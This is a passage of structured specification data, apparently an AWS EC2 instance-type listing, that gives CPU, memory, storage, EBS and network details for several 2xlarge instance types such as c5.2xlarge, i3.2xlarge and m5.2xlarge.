'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 